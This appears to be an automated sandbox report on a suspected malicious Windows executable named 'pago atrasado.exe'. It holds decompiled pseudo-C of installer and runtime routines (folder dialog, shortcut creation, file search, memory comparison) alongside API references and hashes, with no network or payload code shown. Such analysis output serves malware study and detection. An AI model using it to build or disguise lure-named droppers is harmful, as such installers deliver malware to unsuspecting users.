                                            							memset( &_v76, 0, _t152 << 2);
                                            							_v80 = _t166;
                                            							_v72 = 0x420538;
                                            							_v60 = E004045E3;
                                            							_v56 = _t146;
                                            							_v68 = E00405BBA(_t146, 0x420538, _t166, 0x41f908, _v12);
                                            							_t122 =  &_v80;
                                            							_v64 = 0x41;
                                            							__imp__SHBrowseForFolderA(_t122);
                                            							if(_t122 == 0) {
                                            								_a8 = 0x40f;
                                            							} else {
                                            								__imp__CoTaskMemFree(_t122);
                                            								E0040568B(_t146);
                                            								_t124 =  *0x423f50; // 0x661638
                                            								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
                                            								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
                                            									E00405BBA(_t146, 0x420538, _t166, 0, _t125);
                                            									if(lstrcmpiA(0x422ee0, 0x420538) != 0) {
                                            										lstrcatA(_t146, 0x422ee0);
                                            									}
                                            								}
                                            								 *0x420524 =  *0x420524 + 1;
                                            								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                            							}
                                            						}
                                            						goto L20;
                                            					}
                                            					if(_a12 >> 0x10 != 0x300) {
                                            						goto L53;
                                            					}
                                            					_a8 = 0x40f;
                                            					goto L12;
                                            				} else {
                                            					_t165 = GetDlgItem(_t166, 0x3fb);
                                            					if(E004056F8(_t146) != 0 && E0040571F(_t146) == 0) {
                                            						E0040568B(_t146);
                                            					}
                                            					 *0x423718 = _t166;
                                            					SetWindowTextA(_t165, _t146);
                                            					_push( *((intOrPtr*)(_a16 + 0x34)));
                                            					_push(1);
                                            					E00403E54(_t166);
                                            					_push( *((intOrPtr*)(_a16 + 0x30)));
                                            					_push(0x14);
                                            					E00403E54(_t166);
                                            					E00403E89(_t165);
                                            					_t138 = E00405F28(0xa);
                                            					if(_t138 == 0) {
                                            						L53:
                                            						return E00403EBB(_a8, _a12, _a16);
                                            					} else {
                                            						 *_t138(_t165, 1);
                                            						goto L8;
                                            					}
                                            				}
                                            			}

                                            APIs
                                            • GetDlgItem.USER32 ref: 004042E1
                                            • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                                            • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                                            • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                                            • lstrcmpiA.KERNEL32(cuwawvnlx,00420538,00000000,?,?), ref: 004043F9
                                            • lstrcatA.KERNEL32(?,cuwawvnlx), ref: 00404405
                                            • SetDlgItemTextA.USER32 ref: 00404417
                                              • Part of subcall function 0040543D: GetDlgItemTextA.USER32 ref: 00405450
                                              • Part of subcall function 00405DFA: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\pago atrasado.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                                              • Part of subcall function 00405DFA: CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                                              • Part of subcall function 00405DFA: CharNextA.USER32(?,"C:\Users\user\Desktop\pago atrasado.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
                                              • Part of subcall function 00405DFA: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                                            • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044F0
                                              • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                              • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                                              • Part of subcall function 00404649: SetDlgItemTextA.USER32 ref: 00404702
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A$C:\Users\user\AppData\Local\Temp$cuwawvnlx
                                            • API String ID: 2624150263-3601649881
                                            • Opcode ID: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                            • Instruction ID: cfccd4b73e861dd9bc9b7885d3f414f2f86db1ffcc16c92a650f1104495a78a5
                                            • Opcode Fuzzy Hash: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                            • Instruction Fuzzy Hash: EAA17EB1D00218BBDB11AFA5CD41AAFB6B8EF84315F10813BF605B62D1D77C9A418F69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 74%
                                            			E00402053() {
                                            				void* _t44;
                                            				intOrPtr* _t48;
                                            				intOrPtr* _t50;
                                            				intOrPtr* _t52;
                                            				intOrPtr* _t54;
                                            				signed int _t58;
                                            				intOrPtr* _t59;
                                            				intOrPtr* _t62;
                                            				intOrPtr* _t64;
                                            				intOrPtr* _t66;
                                            				intOrPtr* _t69;
                                            				intOrPtr* _t71;
                                            				int _t75;
                                            				signed int _t81;
                                            				intOrPtr* _t88;
                                            				void* _t95;
                                            				void* _t96;
                                            				void* _t100;
                                            
                                            				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
                                            				_t96 = E00402A29(0xffffffdf);
                                            				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
                                            				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
                                            				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
                                            				if(E004056F8(_t96) == 0) {
                                            					E00402A29(0x21);
                                            				}
                                            				_t44 = _t100 + 8;
                                            				__imp__CoCreateInstance(0x4073f8, _t75, 1, 0x4073e8, _t44);
                                            				if(_t44 < _t75) {
                                            					L13:
                                            					 *((intOrPtr*)(_t100 - 4)) = 1;
                                            					_push(0xfffffff0);
                                            				} else {
                                            					_t48 =  *((intOrPtr*)(_t100 + 8));
                                            					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407408, _t100 - 8);
                                            					if(_t95 >= _t75) {
                                            						_t52 =  *((intOrPtr*)(_t100 + 8));
                                            						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                            						_t54 =  *((intOrPtr*)(_t100 + 8));
                                            						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
                                            						_t81 =  *(_t100 - 0x18);
                                            						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                            						if(_t58 != 0) {
                                            							_t88 =  *((intOrPtr*)(_t100 + 8));
                                            							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                            							_t81 =  *(_t100 - 0x18);
                                            						}
                                            						_t59 =  *((intOrPtr*)(_t100 + 8));
                                            						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                            						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
                                            							_t71 =  *((intOrPtr*)(_t100 + 8));
                                            							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
                                            						}
                                            						_t62 =  *((intOrPtr*)(_t100 + 8));
                                            						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
                                            						_t64 =  *((intOrPtr*)(_t100 + 8));
                                            						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
                                            						if(_t95 >= _t75) {
                                            							_t95 = 0x80004005;
                                            							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409408, 0x400) != 0) {
                                            								_t69 =  *((intOrPtr*)(_t100 - 8));
                                            								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409408, 1);
                                            							}
                                            						}
                                            						_t66 =  *((intOrPtr*)(_t100 - 8));
                                            						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                            					}
                                            					_t50 =  *((intOrPtr*)(_t100 + 8));
                                            					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                            					if(_t95 >= _t75) {
                                            						_push(0xfffffff4);
                                            					} else {
                                            						goto L13;
                                            					}
                                            				}
                                            				E00401423();
                                            				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t100 - 4));
                                            				return 0;
                                            			}






















                                            APIs
                                            • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: ByteCharCreateInstanceMultiWide
                                            • String ID: C:\Users\user\AppData\Local\Temp
                                            • API String ID: 123533781-1943935188
                                            • Opcode ID: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                            • Instruction ID: c7e9304a010c998f9a7959bd005017a1970e80d3ce8bb7043a01564e87abbd95
                                            • Opcode Fuzzy Hash: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                            • Instruction Fuzzy Hash: 32416E75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169F905EB2D1CA799C41CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E10009B50(struct _EXCEPTION_POINTERS* _a4) {
                                            
                                            				SetUnhandledExceptionFilter(0);
                                            				return UnhandledExceptionFilter(_a4);
                                            			}



                                            0x10009b55
                                            0x10009b65

                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,10008390,?,?,?,00000001), ref: 10009B55
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 10009B5E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: b656da03d4f53ad6eb9e188b92757f7d37e7a5c5ce8d4448850ca58cee667456
                                            • Instruction ID: 68490d5fedbad4c1c24718ac7e6d684dd58fdb0e9d5ec0c0e3ec346b29ed2d69
                                            • Opcode Fuzzy Hash: b656da03d4f53ad6eb9e188b92757f7d37e7a5c5ce8d4448850ca58cee667456
                                            • Instruction Fuzzy Hash: A9B09231149218BBEB002BE1DC4DB687F29EB08666F088010F60D44061CB72D7108B92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 39%
                                            			E00402671(char __ebx, char* __edi, char* __esi) {
                                            				void* _t19;
                                            
                                            				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
                                            					E00405AF6(__edi, _t6);
                                            					_push(_t19 - 0x170);
                                            					_push(__esi);
                                            					E00405B98();
                                            				} else {
                                            					 *__edi = __ebx;
                                            					 *__esi = __ebx;
                                            					 *((intOrPtr*)(_t19 - 4)) = 1;
                                            				}
                                            				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t19 - 4));
                                            				return 0;
                                            			}





                                            APIs
                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                            • Instruction ID: c4b8fb32876d586bcf7df686e34757fa561d471cbaf363f6388d0c393702730c
                                            • Opcode Fuzzy Hash: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                            • Instruction Fuzzy Hash: 81F0A032A041009ED711EBA49A499EEB7789B11318F60067BE101B21C1C6B859459B2A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E100098B2() {
                                            				void* _t3;
                                            
                                            				_t3 = GetProcessHeap();
                                            				 *0x1001daa0 = _t3;
                                            				return 0 | _t3 != 0x00000000;
                                            			}




                                            0x100098b2
                                            0x100098ba
                                            0x100098c6

                                            APIs
                                            • GetProcessHeap.KERNEL32(10012841,10019380,00000008,10012A19,?,00000001,?,100193A0,0000000C,10012AE9,?,00000001,?), ref: 100098B2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: HeapProcess
                                            • String ID:
                                            • API String ID: 54951025-0
                                            • Opcode ID: a2a19a651c28b9c837c2ad151e4f28f2e31f3a869b93d4498b43ecfd596766f4
                                            • Instruction ID: 41b7f87da54ba6a4b98f41e9d280661a3a923aeea5c2e120528fd8250ba703f3
                                            • Opcode Fuzzy Hash: a2a19a651c28b9c837c2ad151e4f28f2e31f3a869b93d4498b43ecfd596766f4
                                            • Instruction Fuzzy Hash: 2CB092B02051224BAB086B3C5C9410A25D46B08201384812AB003C65A0DF30C510DA04
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E100066E2(void* __edx, void* __esi) {
                                            				signed int _t192;
                                            				signed char _t193;
                                            				signed char _t194;
                                            				signed char _t195;
                                            				signed char _t196;
                                            				signed char _t198;
                                            				signed int _t241;
                                            				void* _t287;
                                            				void* _t292;
                                            				void* _t294;
                                            				void* _t296;
                                            				void* _t298;
                                            				void* _t300;
                                            				void* _t302;
                                            				void* _t304;
                                            				void* _t306;
                                            				void* _t308;
                                            				void* _t310;
                                            				void* _t312;
                                            				void* _t314;
                                            				void* _t316;
                                            				void* _t318;
                                            				void* _t320;
                                            				void* _t322;
                                            				void* _t324;
                                            				void* _t326;
                                            				void* _t327;
                                            
                                            				_t327 = __esi;
                                            				_t287 = __edx;
                                            				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
                                            					_t241 = 0;
                                            					L15:
                                            					if(_t241 != 0) {
                                            						goto L2;
                                            					}
                                            					_t193 =  *(_t327 - 0x1a);
                                            					if(_t193 ==  *(_t287 - 0x1a)) {
                                            						_t241 = 0;
                                            						L26:
                                            						if(_t241 != 0) {
                                            							goto L2;
                                            						}
                                            						_t194 =  *(_t327 - 0x16);
                                            						if(_t194 ==  *(_t287 - 0x16)) {
                                            							_t241 = 0;
                                            							L37:
                                            							if(_t241 != 0) {
                                            								goto L2;
                                            							}
                                            							_t195 =  *(_t327 - 0x12);
                                            							if(_t195 ==  *(_t287 - 0x12)) {
                                            								_t241 = 0;
                                            								L48:
                                            								if(_t241 != 0) {
                                            									goto L2;
                                            								}
                                            								_t196 =  *(_t327 - 0xe);
                                            								if(_t196 ==  *(_t287 - 0xe)) {
                                            									_t241 = 0;
                                            									L59:
                                            									if(_t241 != 0) {
                                            										goto L2;
                                            									}
                                            									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
                                            										_t241 = 0;
                                            										L70:
                                            										if(_t241 != 0) {
                                            											goto L2;
                                            										}
                                            										_t198 =  *(_t327 - 6);
                                            										if(_t198 ==  *(_t287 - 6)) {
                                            											_t241 = 0;
                                            											L81:
                                            											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
                                            											}
                                            											goto L2;
                                            										}
                                            										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
                                            										if(_t292 == 0) {
                                            											L74:
                                            											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
                                            											if(_t294 == 0) {
                                            												L76:
                                            												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
                                            												if(_t296 == 0) {
                                            													L78:
                                            													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
                                            													if(_t241 != 0) {
                                            														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                            													}
                                            													goto L81;
                                            												}
                                            												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
                                            												if(_t241 != 0) {
                                            													goto L2;
                                            												}
                                            												goto L78;
                                            											}
                                            											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
                                            											if(_t241 != 0) {
                                            												goto L2;
                                            											}
                                            											goto L76;
                                            										}
                                            										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
                                            										if(_t241 != 0) {
                                            											goto L2;
                                            										}
                                            										goto L74;
                                            									}
                                            									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
                                            									if(_t298 == 0) {
                                            										L63:
                                            										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
                                            										if(_t300 == 0) {
                                            											L65:
                                            											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
                                            											if(_t302 == 0) {
                                            												L67:
                                            												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
                                            												if(_t241 != 0) {
                                            													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                            												}
                                            												goto L70;
                                            											}
                                            											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
                                            											if(_t241 != 0) {
                                            												goto L2;
                                            											}
                                            											goto L67;
                                            										}
                                            										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
                                            										if(_t241 != 0) {
                                            											goto L2;
                                            										}
                                            										goto L65;
                                            									}
                                            									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
                                            									if(_t241 != 0) {
                                            										goto L2;
                                            									}
                                            									goto L63;
                                            								}
                                            								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
                                            								if(_t304 == 0) {
                                            									L52:
                                            									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
                                            									if(_t306 == 0) {
                                            										L54:
                                            										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
                                            										if(_t308 == 0) {
                                            											L56:
                                            											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
                                            											if(_t241 != 0) {
                                            												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                            											}
                                            											goto L59;
                                            										}
                                            										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
                                            										if(_t241 != 0) {
                                            											goto L2;
                                            										}
                                            										goto L56;
                                            									}
                                            									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
                                            									if(_t241 != 0) {
                                            										goto L2;
                                            									}
                                            									goto L54;
                                            								}
                                            								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
                                            								if(_t241 != 0) {
                                            									goto L2;
                                            								}
                                            								goto L52;
                                            							}
                                            							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
                                            							if(_t310 == 0) {
                                            								L41:
                                            								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
                                            								if(_t312 == 0) {
                                            									L43:
                                            									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
                                            									if(_t314 == 0) {
                                            										L45:
                                            										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
                                            										if(_t241 != 0) {
                                            											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                            										}
                                            										goto L48;
                                            									}
                                            									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
                                            									if(_t241 != 0) {
                                            										goto L2;
                                            									}
                                            									goto L45;
                                            								}
                                            								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
                                            								if(_t241 != 0) {
                                            									goto L2;
                                            								}
                                            								goto L43;
                                            							}
                                            							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
                                            							if(_t241 != 0) {
                                            								goto L2;
                                            							}
                                            							goto L41;
                                            						}
                                            						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
                                            						if(_t316 == 0) {
                                            							L30:
                                            							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
                                            							if(_t318 == 0) {
                                            								L32:
                                            								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
                                            								if(_t320 == 0) {
                                            									L34:
                                            									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
                                            									if(_t241 != 0) {
                                            										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                            									}
                                            									goto L37;
                                            								}
                                            								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
                                            								if(_t241 != 0) {
                                            									goto L2;
                                            								}
                                            								goto L34;
                                            							}
                                            							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
                                            							if(_t241 != 0) {
                                            								goto L2;
                                            							}
                                            							goto L32;
                                            						}
                                            						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
                                            						if(_t241 != 0) {
                                            							goto L2;
                                            						}
                                            						goto L30;
                                            					}
                                            					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
                                            					if(_t322 == 0) {
                                            						L19:
                                            						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
                                            						if(_t324 == 0) {
                                            							L21:
                                            							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
                                            							if(_t326 == 0) {
                                            								L23:
                                            								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
                                            								if(_t241 != 0) {
                                            									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                            								}
                                            								goto L26;
                                            							}
                                            							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
                                            							if(_t241 != 0) {
                                            								goto L2;
                                            							}
                                            							goto L23;
                                            						}
                                            						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
                                            						if(_t241 != 0) {
                                            							goto L2;
                                            						}
                                            						goto L21;
                                            					}
                                            					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
                                            					if(_t241 != 0) {
                                            						goto L2;
                                            					}
                                            					goto L19;
                                            				} else {
                                            					__edi = __al & 0x000000ff;
                                            					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                            					if(__edi == 0) {
                                            						L8:
                                            						__edi =  *(__esi - 0x1d) & 0x000000ff;
                                            						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                            						if(__edi == 0) {
                                            							L10:
                                            							__edi =  *(__esi - 0x1c) & 0x000000ff;
                                            							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                            							if(__edi == 0) {
                                            								L12:
                                            								__ecx =  *(__esi - 0x1b) & 0x000000ff;
                                            								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                            								if(__ecx != 0) {
                                            									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                            								}
                                            								goto L15;
                                            							}
                                            							0 = 0 | __edi > 0x00000000;
                                            							__ecx = (__edi > 0) * 2 != 1;
                                            							if((__edi > 0) * 2 != 1) {
                                            								L2:
                                            								_t192 = _t241;
                                            								return _t192;
                                            							}
                                            							goto L12;
                                            						}
                                            						0 = 0 | __edi > 0x00000000;
                                            						__ecx = (__edi > 0) * 2 != 1;
                                            						if((__edi > 0) * 2 != 1) {
                                            							goto L2;
                                            						}
                                            						goto L10;
                                            					}
                                            					0 = 0 | __edi > 0x00000000;
                                            					__ecx = (__edi > 0) * 2 != 1;
                                            					if((__edi > 0) * 2 != 1) {
                                            						goto L2;
                                            					}
                                            					goto L8;
                                            				}
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                            • Instruction ID: 2adbf60f93d3b186d9e610549e29d149ee88be202c4dc482f1b21a02b0eefda9
                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                            • Instruction Fuzzy Hash: 90C164722095930AFF5DC679883413FBAE29F966F1327476DD4B2DB1D8EE20C524D620
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E10006B17(void* __edx, void* __esi) {
                                            				signed int _t197;
                                            				signed char _t198;
                                            				signed char _t199;
                                            				signed char _t200;
                                            				signed char _t202;
                                            				signed char _t203;
                                            				signed int _t246;
                                            				void* _t294;
                                            				void* _t297;
                                            				void* _t299;
                                            				void* _t301;
                                            				void* _t303;
                                            				void* _t305;
                                            				void* _t307;
                                            				void* _t309;
                                            				void* _t311;
                                            				void* _t313;
                                            				void* _t315;
                                            				void* _t317;
                                            				void* _t319;
                                            				void* _t321;
                                            				void* _t323;
                                            				void* _t325;
                                            				void* _t327;
                                            				void* _t329;
                                            				void* _t331;
                                            				void* _t333;
                                            				void* _t335;
                                            				void* _t336;
                                            
                                            				_t336 = __esi;
                                            				_t294 = __edx;
                                            				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
                                            					_t246 = 0;
                                            					L14:
                                            					if(_t246 != 0) {
                                            						goto L1;
                                            					}
                                            					_t198 =  *(_t336 - 0x1b);
                                            					if(_t198 ==  *(_t294 - 0x1b)) {
                                            						_t246 = 0;
                                            						L25:
                                            						if(_t246 != 0) {
                                            							goto L1;
                                            						}
                                            						_t199 =  *(_t336 - 0x17);
                                            						if(_t199 ==  *(_t294 - 0x17)) {
                                            							_t246 = 0;
                                            							L36:
                                            							if(_t246 != 0) {
                                            								goto L1;
                                            							}
                                            							_t200 =  *(_t336 - 0x13);
